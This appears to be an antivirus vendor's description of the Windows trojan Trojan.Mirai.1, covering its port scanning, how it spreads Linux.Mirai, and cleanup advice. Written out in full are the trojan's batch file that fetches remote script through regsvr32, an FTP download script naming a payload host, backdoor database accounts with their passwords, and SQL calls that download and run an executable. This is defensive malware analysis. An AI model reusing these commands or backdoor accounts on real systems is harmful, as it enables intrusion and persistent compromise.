Library
My library

+ Add to library

Profile

Trojan.Mirai.1

Added to the Dr.Web virus database: 2017-01-30

Virus description added:

SHA1:

  • 9575d5edb955e8e57d5886e1cf93f54f52912238
  • f97e8145e1e818f17779a8b136370c24da67a6a5
  • 42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
  • 938715263e1e24f3e3d82d72b4e1d2b60ab187b8

A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.

When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports. The Trojan can address the following ports:

 * 22
 * 23
 * 135
 * 445
 * 1433
 * 3306
 * 3389

Launch flags:

-syn - use scanning in Tcp_Syn mode instead of Tcp_connect mode
-log - log information in the log file
-see - display console window
-srv - launch as a server
-cli - launch as a client
-start, -stop, -create, -delete - service management
-run – launch the Trojan as an application, not as a service
-s - launch the Trojan a service

In case of successful connection to the remote node via any used protocol except RDP, the Trojan executes a set of commands indicated in the configuration file. While connecting to the Linux device via Telnet protocol, it downloads a binary file, and this file subsequently downloads and launches Linux.Mirai.

For connections with WMI, it launches processes with Win32_Process.Create method in the remote system. Using IPC, it can directly send IPC commands to the remote node.

Upon connection to the remote MS SQL server, it creates file С:\windows\system32\wbem\123.bat with the following content:

@echo off
mode con: cols=13 lines=1
cacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f&cacls C:\\windows\\system32\\cacls.exe /e /g system:f&cacls C:\\windows\\system32\\cmd.exe /e /g system:f&cacls C:\\windows\\system32\\ftp.exe /e /g system:f&cacls C:\\windows\\system32\\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://*****.com:280/v.sct scrobj.dll
if exist c:\\windows\\debug\\item.dat start rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa
exit

Creates file PerfStringse.ini with the following content:

[Version]
signature=$CHICAGO$
[File Security]
1=c:\\windows\\system32\\cmd.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\ftp.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\cacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\regsvr32.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\icacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\net1.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)

Creates file c:\windows\systemmyusa.dvr with the following content:

open down.f321y.com
mssql
1433
get 1.dat c:\\windows\\system\\myusago.dvr
get 1.bat c:\\windows\\system\\backs.bat
bye

It also creates DBMS user with login Mssqla and password Bus3456#qwein, grants him sysadmin privileges. Acting under the name of this user and with the help of SQL server event service, various tasks are executed.

Upon connection to the remote MySQL server, it creates a user with the name MySQL and password phpgod, grants him the following privileges:

select
insert
update
delete
create
drop
reload
shutdown
process
file
grant
references
index
alter
show_db
super
create_tmp_table
lock_tables
execute
repl_slave
repl_client
create_view
show_view
create_routine
alter_routine
create_user
event
trigger
create_tablespace

Creates dynamic library in the folder C:\Windows\System32\ and imports its functions. Executes the following MySQL commands:

SELECT downa("http://*****.com:280/mysql.exe","c:\\windows\\system32\\ser.exe");
SELECT cmda("C:\\windows\\system32\\ser.exe");

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android